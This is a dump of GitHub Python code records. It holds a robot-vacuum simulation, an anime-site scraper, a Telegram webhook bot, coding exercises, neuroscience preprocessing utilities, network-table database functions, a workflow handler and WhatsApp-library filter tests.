(self.scan_hoek/365)*2*np.pi\n\t\tself.distance = distance_sensor(self.handle,self.sensors,self.clientID,self.distance)\n\t\tif lidar_positie > np.pi/2:\n\t\t\tlidar_positie = 0\n\t\t\tself.measured_points_x,self.measured_points_y,self.map_x,self.map_y,self.robot_map_x,self.robot_map_y,self.new_location = self.ObjSlam.calculations(self.distance,self.locatie)\n\t\t\treal_locatie = get_position(self.handle,self.clientID,'Dummy')\n\t\t\tObjRobot.plotting()\n\t\t\tself.distance = {'Laser_Sensor':[],'Laser_Sensor0':[],'Laser_Sensor1':[],'Laser_Sensor2':[]}\n\t\t\tself.modus = 1\n\t\tmove_lidar_motor(self.handle,'Lidar_Motor',lidar_positie,self.clientID)\n\t\t\n\tdef plotting(self):\n\t\t#rood is berekende locatie\n\t\t#groen is werkelijke locatie\n\t\tplt.gcf().clear()\n\t\tplt.scatter(self.locatie[0],self.locatie[1],color='red')\n\t\tif self.ticks > 0:\n\t\t\tplt.scatter(self.real_position[1][1],-self.real_position[1][0],color='green')\n\t\tif self.new_location is not False:\n\t\t\tplt.scatter(self.new_location[0],self.new_location[1],color='orange')\t\t\n\t\tplt.scatter(self.measured_points_x,self.measured_points_y,color='purple')\n\t\tplt.scatter(self.robot_map_x,self.robot_map_y,color='blue')\n\t\tplt.scatter(self.map_x,self.map_y,color='yellow')\n\t\tplt.axis('equal')\n\t\tplt.draw\n\t\tplt.pause(0.001)\n\t\t\n\t\t\nObjRobot = Robot()\n\n\ntry:\n\twhile True:\n\t\tif ObjRobot.modus == 0:\n\t\t\tObjRobot.scanning()\n\t\tif ObjRobot.modus == 1:\n\t\t\tObjRobot.drive()\n\t\tvrep.simxSynchronousTrigger(ObjRobot.clientID)\n\t\t\nexcept KeyboardInterrupt:\n\tvrep.simxStopSimulation(ObjRobot.clientID,vrep.simx_opmode_oneshot)\n\tprint('Simulation stopped')\n\tsys.exit()","repo_name":"remblim/V-rep-stofzuiger","sub_path":"stofzuiger3.py","file_name":"stofzuiger3.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12395386384","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom AIOAS.utils import Utils\nimport re\n\n\nclass FourAnime:\n util = Utils()\n\n def get_anime(self, url):\n result = []\n try:\n with requests.get(url) as r:\n soup = BeautifulSoup(r.text, \"html.parser\")\n animes = soup.find_all(id=\"headerDIV_3\")\n for anime in animes:\n aninfo = anime.find(id=\"headerA_5\")\n result.append(\n {\n aninfo.find(id=\"headerIMG_6\").attrs[\"alt\"]: aninfo.attrs[\n \"href\"\n ]\n }\n )\n except:\n result = self.get_anime(url)\n return result\n\n def get_all_anime(self):\n result = []\n page = None\n while page is None or page > 0:\n page = self.get_anime(\n f\"https://4anime.to/browse?sort_order=title+asc&sf_paged={x}\"\n )\n result += page\n return result\n\n def get_episodes_from_slug(self, slug):\n result = {\"episodes\": [], \"amount\": 0}\n with requests.get(f\"https://4anime.to/anime/{slug}\") as r:\n soup = BeautifulSoup(r.text, \"html.parser\")\n episodes = soup.find(\"ul\", {\"class\": \"episodes range active\"}).find_all(\n \"li\"\n )\n result[\"amount\"] = len(episodes)\n for x in episodes:\n result[\"episodes\"].append(str(x.find(\"a\").attrs[\"href\"]))\n return result\n\n def get_source_from_ep_url(self, url):\n with requests.get(url) as r:\n soup = BeautifulSoup(r.text, \"html.parser\")\n script = soup.find(\"div\", {\"class\": \"mirror-footer cl\"}).find(\"script\")\n try:\n unpacked = self.util.better_unpack(str(script)).replace(\"\\\\\\\\\", \"\")\n except AttributeError:\n unpacked = str(script).replace(\"\\\\\", \"\")\n result = re.search(\n ' 4096:\n for x in range(0, len(response), 4096):\n bot.send_message(chat_id=chat_id, text=response[x:x+4096])\n else:\n bot.send_message(chat_id=chat_id, text=response)\n\n if \"btns\" in bundle.keys():\n btns = bundle[\"btns\"]\n bot.sendMessage (chat_id=chat_id, text=str(\"------------------\"), reply_markup=btns)\n \n return 'ok'\n\n\ndef button(update: telegram.Update, context: CallbackContext) -> None:\n \"\"\"Parses the CallbackQuery and updates the message text.\"\"\"\n query = update.callback_query\n\n # CallbackQueries need to be answered, even if no notification to the user is needed\n # Some clients may have trouble otherwise. See https://core.telegram.org/bots/api#callbackquery\n query.answer()\n\n query.edit_message_text(text=f\"Selected option: {query.data}\")\n\n#eSTE ultimo ejemplo no incluye esta funcionsino que llama setwebhook \n#en elmain, lodejamos pues no debe de dar conflicto\n@app.route('/setwebhook', methods=['GET', 'POST'])\ndef set_webhook():\n # we use the bot object to link the bot to our app which live\n # in the link provided by URL\n s = bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=TOKEN))\n # something to let us know things work\n if s:\n return \"webhook setup ok\"\n else:\n return \"webhook setup failed\"\n\n\n\n@app.route('/')\ndef index():\n return '.'\n\n\nif __name__ == '__main__':\n dispatcher.add_handler(CommandHandler(\"start\", start))\n updater._init_thread(dispatcher.start, \"dispatcher\")\n \n #teniamos bot.setWebhook pero cambiamos a set_webhook porque los bot se \n #declaran diferente en este ejemplo, aqui es a partir del updater en el otro es de telegram\n bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=TOKEN))\n #bot.set_webhook(f\"https://{herokuname}.herokuapp.com/{TOKEN}\")\n\n time.sleep(5)\n # note the threaded arg which allow\n # your app to have more than one thread\n app.run(threaded=True)\n \n","repo_name":"cjpm1983/telebot1","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41411402191","text":"side_by_players = {}\nplayers_by_side = {}\n\nwhile True:\n command = input()\n if command == \"Lumpawaroo\":\n break\n else:\n if \"|\" in command:\n command = command.split(\" | \")\n force_side = command[0]\n force_user = command[1]\n if force_side not in players_by_side:\n players_by_side[force_side] = []\n if force_user not in side_by_players:\n side_by_players[force_user] = force_side\n players_by_side[force_side].append(force_user)\n if \" -> \" in command:\n command = command.split(\" -> \")\n force_user = command[0]\n force_side = command[1]\n\n if force_side not in players_by_side:\n players_by_side[force_side] = []\n players_by_side[force_side].append(force_user)\n if force_user in side_by_players:\n other_side = side_by_players[force_user]\n players_by_side[other_side].remove(force_user)\n side_by_players[force_user] = force_side\n else:\n side_by_players[force_user] = force_side\n print(f\"{force_user} joins the {force_side} side!\")\n\nfor side, members in players_by_side.items():\n if len(members) == 0:\n continue\n print(f\"Side: {side}, Members: {len(members)}\")\n for member in members:\n print(f\"! {member}\")\n\n\n\n","repo_name":"GloriyaSG/PythonFundamentalsProjects","sub_path":"dictionaries_exercise/force_book.py","file_name":"force_book.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39690434334","text":"from aocd import get_data, submit\nfrom typing import Any\nfrom pprint import PrettyPrinter\n\ntest_input=\"\"\"addx 15\naddx -11\naddx 6\naddx -3\naddx 5\naddx -1\naddx -8\naddx 13\naddx 4\nnoop\naddx -1\naddx 5\naddx -1\naddx 5\naddx -1\naddx 5\naddx -1\naddx 5\naddx -1\naddx -35\naddx 1\naddx 24\naddx -19\naddx 1\naddx 16\naddx -11\nnoop\nnoop\naddx 21\naddx -15\nnoop\nnoop\naddx -3\naddx 9\naddx 1\naddx -3\naddx 8\naddx 1\naddx 5\nnoop\nnoop\nnoop\nnoop\nnoop\naddx -36\nnoop\naddx 1\naddx 7\nnoop\nnoop\nnoop\naddx 2\naddx 6\nnoop\nnoop\nnoop\nnoop\nnoop\naddx 1\nnoop\nnoop\naddx 7\naddx 1\nnoop\naddx -13\naddx 13\naddx 7\nnoop\naddx 1\naddx -33\nnoop\nnoop\nnoop\naddx 2\nnoop\nnoop\nnoop\naddx 8\nnoop\naddx -1\naddx 2\naddx 1\nnoop\naddx 17\naddx -9\naddx 1\naddx 1\naddx -3\naddx 11\nnoop\nnoop\naddx 1\nnoop\naddx 1\nnoop\nnoop\naddx -13\naddx -19\naddx 1\naddx 3\naddx 26\naddx -30\naddx 12\naddx -1\naddx 3\naddx 1\nnoop\nnoop\nnoop\naddx -9\naddx 18\naddx 1\naddx 2\nnoop\nnoop\naddx 9\nnoop\nnoop\nnoop\naddx -1\naddx 2\naddx -37\naddx 1\naddx 3\nnoop\naddx 15\naddx -21\naddx 22\naddx -6\naddx 1\nnoop\naddx 2\naddx 1\nnoop\naddx -10\nnoop\nnoop\naddx 20\naddx 1\naddx 2\naddx 2\naddx -6\naddx -11\nnoop\nnoop\nnoop\"\"\"\n\ndef get_cycle_actions(input:Any) -> int:\n register={1:1}\n current_cycle = 1\n for op in input:\n if len(op.split(' ')) == 1:\n current_cycle += 1\n register[current_cycle]=0 #noop\n else:\n current_cycle += 1\n register[current_cycle]=0\n current_cycle += 1\n register[current_cycle]=int(op.split(' ')[1])\n return register\n\ndef get_sprite_position(register:dict) -> dict:\n sprite_positions = {}\n for current_key, current_val in register.items():\n sprite_center = sum([v for (k,v) in register.items() if k <= current_key])\n sprite_positions[current_key-1] = list(range(sprite_center-1,sprite_center+2))\n return sprite_positions\n \ndef print_screen(sprite_positions:dict):\n screen = [\n [],\n [],\n [],\n [],\n [],\n [],\n []\n ]\n for cycle, position in sprite_positions.items():\n screen[cycle//40].append('#' if cycle%40 in position else '.')\n lines = [''.join(x) for x in screen[:6]]\n picture = '\\n'.join(lines)\n print(picture)\n\nif __name__ == '__main__':\n zip_data = lambda cycles,register: [(c,register) for c in cycles]\n cycle_signal_strength = lambda data: sum([v for (k,v) in data[1].items() if k <= data[0]]) * data[0]\n \n # Test Case\n test_output = get_cycle_actions(test_input.split('\\n'))\n cycles = [20,60,100,140,180,220]\n assert 13140 == sum(list(map(cycle_signal_strength,zip_data(cycles,test_output))))\n\n # Part A\n d = get_data(day=10, year=2022)\n register_a = get_cycle_actions(d.split('\\n'))\n a = sum(list(map(cycle_signal_strength,zip_data(cycles,register_a))))\n\n submit(a, part=\"a\", day=10, year=2022)\n \n # Part B\n print_screen(get_sprite_position(test_output)) # Test Print to screen for input data\n \"\"\"\n ##..##..##..##..##..##..##..##..##..##..\n ###...###...###...###...###...###...###.\n ####....####....####....####....####....\n #####.....#####.....#####.....#####.....\n ######......######......######......####\n #######.......#######.......#######.....\n \"\"\"\n\n sprite_positions = get_sprite_position(register_a)\n print_screen(sprite_positions)\n \"\"\"\n ###...##..#..#.####..##..#....#..#..##..\n #..#.#..#.#..#.#....#..#.#....#..#.#..#.\n #..#.#....####.###..#....#....#..#.#....\n ###..#.##.#..#.#....#.##.#....#..#.#.##.\n #....#..#.#..#.#....#..#.#....#..#.#..#.\n #.....###.#..#.#.....###.####..##...###.\n \"\"\"\n\n","repo_name":"M-Barrows/AdventofCode","sub_path":"2022/python/Day_10.py","file_name":"Day_10.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11611087229","text":"\"\"\"this file deals with preprocessing, such as creating delay line, whitening\"\"\"\n\nimport numpy as np\n\n\ndef _prepare_stimulus_one_delay(stimulus_flat, delay, truncate_pars):\n assert stimulus_flat.ndim > 1\n assert abs(delay) < stimulus_flat.shape[0]\n filler = np.zeros((abs(delay),) + stimulus_flat.shape[1:], dtype=stimulus_flat.dtype)\n if delay > 0:\n # see the past; remove last delay elements\n result = np.concatenate([filler, stimulus_flat[:(-delay)]], axis=0)\n else:\n # see the future; remove first (-delay)\n result = np.concatenate([stimulus_flat[(-delay):], filler], axis=0)\n # then let's truncate.\n result = _truncate_array(result, truncate_pars)\n assert not np.may_share_memory(result, stimulus_flat)\n return result\n\n\ndef flatten_stimulus_list(stimulus_list):\n \"\"\"make stimulus data all 2D for each trial\"\"\"\n return [stimulus_this.reshape(stimulus_this.shape[0], -1) for stimulus_this in stimulus_list]\n\n\ndef _prepare_stimulus_all_delays_one_trial(stimulus_flat, delays, truncate_pars):\n assert stimulus_flat.ndim == 2\n return np.concatenate([_prepare_stimulus_one_delay(stimulus_flat, d, truncate_pars) for d in delays], axis=1)\n\n\ndef prepare_stimulus_all_delays_all_trials(flat_stimulus_list, delays, truncate_pars=(0, 0)):\n return [_prepare_stimulus_all_delays_one_trial(stimulus_flat, delays, truncate_pars) for\n stimulus_flat in flat_stimulus_list]\n\n\ndef _truncate_array(arr, truncate_config):\n arr_old_shape = arr.shape\n truncate_before, truncate_after = truncate_config\n assert truncate_before >= 0 and truncate_after >= 0\n assert truncate_before + truncate_after < len(arr) # at least you need to keep something.\n if truncate_before > 0:\n arr = arr[truncate_before:]\n if truncate_after > 0:\n arr = arr[:-truncate_after]\n assert arr.shape == (arr_old_shape[0] - (truncate_before + truncate_after),) + arr_old_shape[1:]\n\n return arr\n\n\ndef check_input(stimulus_list, response_list):\n \"\"\"check all input is good\n\n :param stimulus_list: an iterable of trials, each of shape T_i x [S], where T_i is number of time bins for trial i,\n and [S] is the shape of stimulus.\n :param response_list: an iterable of responses, each of shape T_i x M, where M is number of neurons.\n :return: a tuple of the following 4 elements:\n list version of stimulus_list\n list version of response_list\n shape of stimulus (a tuple)\n number of neurons\n \"\"\"\n n_trial = len(stimulus_list)\n assert n_trial == len(response_list) and n_trial >= 1\n stimulus_list_good = []\n response_list_good = []\n\n kernel_shape_first = None\n neuron_number_first = None\n for t, (stimulus, response) in enumerate(zip(stimulus_list, response_list)):\n stimulus_good, response_good, kernel_shape, neuron_number = _check_input_one(stimulus,\n response)\n if kernel_shape_first is None and neuron_number_first is None:\n kernel_shape_first = kernel_shape\n neuron_number_first = neuron_number\n else:\n assert kernel_shape_first == kernel_shape and neuron_number_first == neuron_number\n stimulus_list_good.append(stimulus)\n response_list_good.append(response)\n\n return stimulus_list_good, response_list_good, kernel_shape_first, neuron_number_first\n\n\ndef reshape_kernel(kernels_recovered, stim_shape, num_delay, num_neuron, multiple_kernel_per_neuron=False):\n assert np.all(np.asarray(stim_shape) > 0) and num_delay > 0\n num_kernel_element = num_delay * np.prod(np.asarray(stim_shape))\n assert num_neuron > 0 and num_kernel_element > 0\n if multiple_kernel_per_neuron:\n a, b, c = kernels_recovered.shape\n assert b > 0\n new_shape = (num_neuron, b, num_delay) + stim_shape\n else:\n a, c = kernels_recovered.shape\n new_shape = (num_neuron, num_delay) + stim_shape\n assert (a, c) == (num_neuron, num_kernel_element)\n\n return np.reshape(kernels_recovered, new_shape)\n\n\ndef _check_input_one(stimulus, response):\n # for maximum precision, some many procedures only give double output.\n stimulus = np.asarray(stimulus)\n response = np.asarray(response)\n assert stimulus.ndim > 1 and response.ndim == 2\n assert stimulus.shape[0] == response.shape[0]\n assert stimulus.size > 0 and response.size > 0\n ret = stimulus, response\n ret = ret + (stimulus.shape[1:],)\n ret = ret + (response.shape[1],)\n return ret\n\n\ndef cov_matrix(stim):\n n, d = stim.shape\n assert n > 1 and d > 1 # when D is 1, returned might be a scalar...\n # compute covariance matrix\n # notice that while np.cov would subtract the mean, you should do it yourself when passing stim into STA and STC.\n # this norms data by N-1\n cov = np.cov(stim, rowvar=False)\n assert cov.shape == (d, d)\n return cov\n","repo_name":"chris-warner-II/Cell_Assembly_Codebase","sub_path":"python_code/utils/strflab/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16668220140","text":"import pandas as pd\r\nfrom model.model_db import *\r\nfrom datetime import datetime \r\nfrom pprint import pprint as pp \r\nimport json\r\n\r\n \r\ndef save_arp_table(device_ip, df_table):\r\n ''' Push received device arp table to database'''\r\n with Session() as session:\r\n # arp_objects = []\r\n try:\r\n for index, row in df_table.iterrows():\r\n arp_row = ArpTable(\r\n mac_address = row['mac_address'],\r\n ip_address = row['ip_address'],\r\n interface_name = row['interface_name'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(arp_row)\r\n # print(arp_row)\r\n session.commit()\r\n except Exception as e:\r\n print(\"EXCEPTION on save_arp_table => \", e)\r\n \r\n session.close()\r\n\r\ndef save_ethernet_switching_table(device_ip, df_table):\r\n ''' Push received device ethernet-switching table to database'''\r\n with Session() as session:\r\n try:\r\n es_objects = []\r\n for index, row in df_table.iterrows():\r\n es_row = EthernetSwitchingTable(\r\n mac_address = row['mac_address'],\r\n vlan = row['vlan_name'],\r\n logical_interface = row['logical_interface'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(es_row)\r\n # print(es_row)\r\n session.commit()\r\n \r\n except Exception as e:\r\n print(\"EXCEPTION on save_ethernet_switching_table => \", e)\r\n \r\n session.close()\r\n\r\n\r\ndef save_interfaces_table(device_ip, in_table):\r\n ''' Push received device interfaces table to database'''\r\n with Session() as session:\r\n try:\r\n for index, row in in_table.iterrows():\r\n in_row = InterfacesTable(\r\n interface = row['interface'],\r\n description = row['description'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(in_row)\r\n # print(in_row)\r\n session.commit()\r\n\r\n except Exception as e:\r\n print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n session.close()\r\n\r\ndef save_neighbors_table(device_ip, ne_table):\r\n ''' Push received device neighbors table to database'''\r\n with Session() as session:\r\n try:\r\n for index, row in ne_table.iterrows():\r\n in_row = NeighborsTable(\r\n local_interface = row['local_interface'],\r\n device_id = row['device_id'],\r\n port_info = row['port_info'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(in_row)\r\n # print(in_row)\r\n session.commit()\r\n\r\n except Exception as e:\r\n print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n session.close()\r\n\r\ndef get_transit_interfaces():\r\n ''' Returns transit interfaces table '''\r\n result = []\r\n with Session() as session:\r\n for id, int, vend in session.query(TransitInterfaces.id, TransitInterfaces.description, DeviceVendors.name)\\\r\n .join(DeviceVendors).filter(DeviceVendors.id == TransitInterfaces.vendor).all():\r\n data = {\r\n 'id': id,\r\n 'transit_interface': int,\r\n 'vendor': vend.name,\r\n }\r\n result.append(data)\r\n return result\r\n\r\ndef transit_interfaces_controller(new_int, delete_int, edit_int):\r\n response = \"\"\r\n with Session() as session:\r\n if(new_int):\r\n response += \"Added: \"\r\n for i in new_int:\r\n int_to_add = TransitInterfaces(\r\n description = i['transit_interface'].lower(),\r\n vendor = VendorEnum[ i['vendor'] ].value\r\n )\r\n session.merge(int_to_add)\r\n response += str(i) + \";\"\r\n session.commit()\r\n if(delete_int):\r\n response += \"Deleted: \"\r\n for i in delete_int:\r\n session.query(TransitInterfaces).filter(TransitInterfaces.id == i['id']).delete()\r\n response += str(i) + \";\"\r\n session.commit()\r\n if(edit_int):\r\n response += \"Modified: \"\r\n for i in edit_int:\r\n int = session.query(TransitInterfaces).filter(TransitInterfaces.id == i['id']).first()\r\n int.description = i['transit_interface'].lower()\r\n int.vendor = VendorEnum[i['vendor']].value\r\n response += str(i) + \";\"\r\n session.commit()\r\n session.close()\r\n return response","repo_name":"psitadmin/network-junco","sub_path":"server/arp_service/arp_db.py","file_name":"arp_db.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27564718647","text":"'''\n16. Write a program that solves the following problem: a “xerox” copy costs R$ 0.25 per sheet, but over 100 sheets this value drops to R$ 0.20 per unit. Given the total number of copies, inform the amount to be paid.\n'''\n\ncopias = int(input(\"Informe a quantidade de cópias: \"))\n\nxerox = copias * 0.25\n\nif copias > 100: \n xerox = 0.20 * copias\n\nprint(f\"O valor a ser pago será de R${(round(xerox, 2))}\")\n","repo_name":"Vitfpx/Python","sub_path":"Ex_college/Ex16.py","file_name":"Ex16.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"784095537","text":"from __future__ import annotations\n\nimport os\nfrom typing import Any\n\nfrom lsst.cm.tools.core.db_interface import DbInterface\nfrom lsst.cm.tools.core.utils import LevelEnum, StatusEnum\nfrom lsst.cm.tools.db.entry_handler import GenericEntryHandler\nfrom lsst.cm.tools.db.group import Group\nfrom lsst.cm.tools.db.handler_utils import rollback_jobs\nfrom lsst.cm.tools.db.workflow import Workflow\n\n\nclass WorkflowHandler(GenericEntryHandler):\n \"\"\"Campaign level callback handler\n\n Provides interface functions.\n \"\"\"\n\n config_block = \"workflow\"\n\n fullname_template = os.path.join(\n \"{production_name}\",\n \"{campaign_name}\",\n \"{step_name}\",\n \"{group_name}\",\n \"w{workflow_idx:02}\",\n )\n\n level = LevelEnum.workflow\n\n def insert(self, dbi: DbInterface, parent: Group, **kwargs: Any) -> Workflow:\n kwcopy = kwargs.copy()\n workflow_idx = len(parent.w_)\n kwcopy[\"workflow_idx\"] = workflow_idx\n insert_fields = dict(\n name=f\"{workflow_idx:02}\",\n fullname=self.get_fullname(**kwcopy),\n p_id=parent.p_.id,\n c_id=parent.c_.id,\n s_id=parent.s_.id,\n g_id=parent.id,\n idx=workflow_idx,\n config_id=parent.config_id,\n frag_id=self._fragment_id,\n coll_in=parent.coll_in,\n coll_out=parent.coll_out,\n bps_yaml_template=self.get_config_var(\"bps_yaml_template\", parent.bps_yaml_template, **kwcopy),\n bps_script_template=self.get_config_var(\n \"bps_script_template\", parent.bps_script_template, **kwcopy\n ),\n pipeline_yaml=self.get_config_var(\"pipeline_yaml\", parent.pipeline_yaml, **kwcopy),\n lsst_version=self.get_config_var(\"lsst_version\", parent.lsst_version, **kwcopy),\n lsst_custom_setup=self.get_config_var(\"lsst_custom_setup\", parent.lsst_custom_setup, **kwcopy),\n data_query=kwcopy.get(\"data_query\", parent.data_query),\n status=StatusEnum.waiting,\n )\n workflow = Workflow.insert_values(dbi, **insert_fields)\n return workflow\n\n def requeue_job(self, dbi: DbInterface, entry: Any, job_name: str = \"job\") -> None:\n job_handler = entry.get_sub_handler(job_name)\n job_handler.insert(\n dbi,\n entry,\n name=job_name,\n )\n\n def _make_jobs(self, dbi: DbInterface, entry: Any) -> None:\n job_handler = entry.get_sub_handler(self.config.get(\"job_config\", \"job\"))\n job_handler.insert(\n dbi,\n entry,\n name=\"job\",\n )\n return StatusEnum.ready\n\n def make_children(self, dbi: DbInterface, entry: Workflow) -> StatusEnum:\n return StatusEnum.populating\n\n def supersede_hook(self, dbi: DbInterface, entry: Any, purge: bool = False) -> None:\n rollback_jobs(dbi, entry, purge)\n","repo_name":"lsst-dm/cm_tools","sub_path":"src/lsst/cm/tools/db/workflow_handler.py","file_name":"workflow_handler.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21004449029","text":"import dataclasses\nimport random\nfrom typing import Callable, TypeVar\n\nfrom pywa import filters as fil, WhatsApp\nfrom pywa.errors import WhatsAppError, MediaUploadError\nfrom pywa.types import (\n Message,\n CallbackSelection,\n CallbackButton,\n MessageStatus,\n TemplateStatus,\n)\nfrom pywa.types.base_update import BaseUpdate\nfrom tests.common import UPDATES, API_VERSIONS, WA_NO_FILTERS\n\n_T = TypeVar(\"_T\", bound=BaseUpdate)\n\n\ndef same(x: _T) -> _T:\n return x\n\n\n# {filename: {test_name: [(update_modifier, filter_func)]}}\n\nFILTERS: dict[\n str, dict[str, list[tuple[Callable[[_T], _T], Callable[[WhatsApp, _T], bool]]]]\n] = {\n \"message\": {\n \"text\": [\n (same, fil.text),\n (lambda m: modify_text(m, \"hello\"), fil.text.matches(\"hello\")),\n (\n lambda m: modify_text(m, \"hello\"),\n fil.text.matches(\"hello\", ignore_case=True),\n ),\n (lambda m: modify_text(m, \"hi hello\"), fil.text.contains(\"hello\")),\n (\n lambda m: modify_text(m, \"hi Hello\"),\n fil.text.contains(\"hello\", \"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.startswith(\"hi\"),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.startswith(\"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.endswith(\"bye\"),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.endswith(\"Bye\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.regex(r\"^hi\", r\"bye$\"),\n ),\n (\n lambda m: modify_text(m, \"abcdefg\"),\n fil.text.length((5, 10)),\n ),\n (\n lambda m: modify_text(m, \"!start\"),\n fil.text.command(\"start\"),\n ),\n (\n lambda m: modify_text(m, \"/start\"),\n fil.text.command(\"start\", prefixes=\"!/\"),\n ),\n (\n lambda m: modify_text(m, \"!Start\"),\n fil.text.command(\"staRt\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"!start\"),\n fil.text.is_command,\n ),\n ],\n \"image\": [\n (same, fil.image),\n (lambda m: add_caption(m), fil.image.has_caption),\n (\n lambda m: modify_img_mime_type(m, \"image/jpeg\"),\n fil.image.mimetypes(\"image/jpeg\"),\n ),\n ],\n \"video\": [\n (same, fil.video),\n (lambda m: add_caption(m), fil.video.has_caption),\n ],\n \"document\": [\n (same, fil.document),\n (lambda m: add_caption(m), fil.document.has_caption),\n ],\n \"audio\": [\n (same, fil.audio.audio),\n ],\n \"voice\": [\n (same, fil.audio.voice),\n ],\n \"static_sticker\": [\n (same, fil.sticker.static),\n ],\n \"animated_sticker\": [\n (same, fil.sticker.animated),\n ],\n \"reaction\": [\n (same, fil.reaction.added),\n (\n lambda m: modify_reaction(m, \"😀\"),\n fil.reaction.emojis(\"😀\"),\n ),\n ],\n \"unreaction_empty\": [\n (same, fil.reaction.removed),\n ],\n \"unreaction_no_emoji\": [(same, fil.reaction.removed)],\n \"current_location\": [\n (same, fil.location.current_location),\n (\n lambda m: modify_location(m, 37.4611794, -122.2531785),\n fil.location.in_radius(37.47, -122.25, 10),\n ),\n ],\n \"chosen_location\": [(same, fil.not_(fil.location.current_location))],\n \"contacts\": [\n (same, fil.contacts),\n (\n lambda m: add_wa_number_to_contact(m),\n fil.contacts.has_wa,\n ),\n (\n lambda m: keep_only_one_contact(m),\n fil.contacts.count(min_count=1, max_count=1),\n ),\n (\n lambda m: modify_contact_phone(m, \"123456789\"),\n fil.contacts.phones(\"+123456789\"),\n ),\n ],\n \"order\": [\n (same, fil.order),\n (\n lambda m: modify_order_price(m, 100, 3),\n fil.order.price(min_price=100, max_price=400),\n ),\n (\n lambda m: modify_order_products_count(m, 3),\n fil.order.count(min_count=2, max_count=5),\n ),\n (\n lambda m: modify_order_product_sku(m, \"SKU123\"),\n fil.order.has_product(\"SKU123\"),\n ),\n ],\n \"unsupported\": [(same, fil.unsupported)],\n \"reply\": [(same, fil.reply)],\n \"forwarded\": [(same, fil.forwarded)],\n \"forwarded_many_times\": [(same, fil.forwarded)],\n \"interactive_message_with_err\": [],\n },\n \"callback_button\": {\n \"button\": [\n (\n lambda m: modify_callback_data(m, \"hi\"),\n fil.callback.data_matches(\"hi\"),\n ),\n (\n lambda m: modify_callback_data(m, \"Hi\"),\n fil.callback.data_matches(\"hi\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_contains(\"hi\"),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_contains(\"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_startswith(\"hi\"),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_startswith(\"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_endswith(\"bye\"),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_endswith(\"Bye\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"data:123\"),\n fil.callback.data_regex(\"^data:\", r\"\\d{3}$\"),\n ),\n ],\n \"quick_reply\": [],\n },\n \"callback_selection\": {\n \"callback\": [],\n \"description\": [],\n },\n \"message_status\": {\n \"sent\": [(same, fil.message_status.sent)],\n \"failed\": [\n (\n lambda m: modify_status_err(\n m, WhatsAppError.from_dict({\"code\": 131053, \"message\": \"error\"})\n ),\n fil.message_status.failed_with(MediaUploadError),\n ),\n (\n lambda m: modify_status_err(\n m, WhatsAppError.from_dict({\"code\": 131053, \"message\": \"error\"})\n ),\n fil.message_status.failed_with(131053),\n ),\n ],\n },\n \"template_status\": {\n \"approved\": [\n (same, fil.template_status.on_event(TemplateStatus.TemplateEvent.APPROVED))\n ],\n },\n \"flow_completion\": {\"completion\": []},\n}\n\nRANDOM_API_VER = random.choice(API_VERSIONS)\n\n\ndef test_combinations():\n assert fil.all_(lambda _, __: True, lambda _, __: True)\n assert fil.any_(lambda _, __: True, lambda _, __: False)\n assert fil.not_(lambda _, __: False)\n\n\ndef test_filters():\n for filename, tests in UPDATES[RANDOM_API_VER].items():\n for test in tests:\n for test_name, update in test.items():\n for update_modifier, filter_func in FILTERS[filename][test_name]:\n update = update_modifier(update)\n try:\n assert filter_func(WA_NO_FILTERS, update)\n except AssertionError as e:\n raise AssertionError(\n f\"Test {filename}/{test_name} failed on {update}\"\n ) from e\n\n\ndef modify_text(msg: Message, to: str):\n return dataclasses.replace(msg, text=to)\n\n\ndef add_caption(msg: Message):\n return dataclasses.replace(msg, 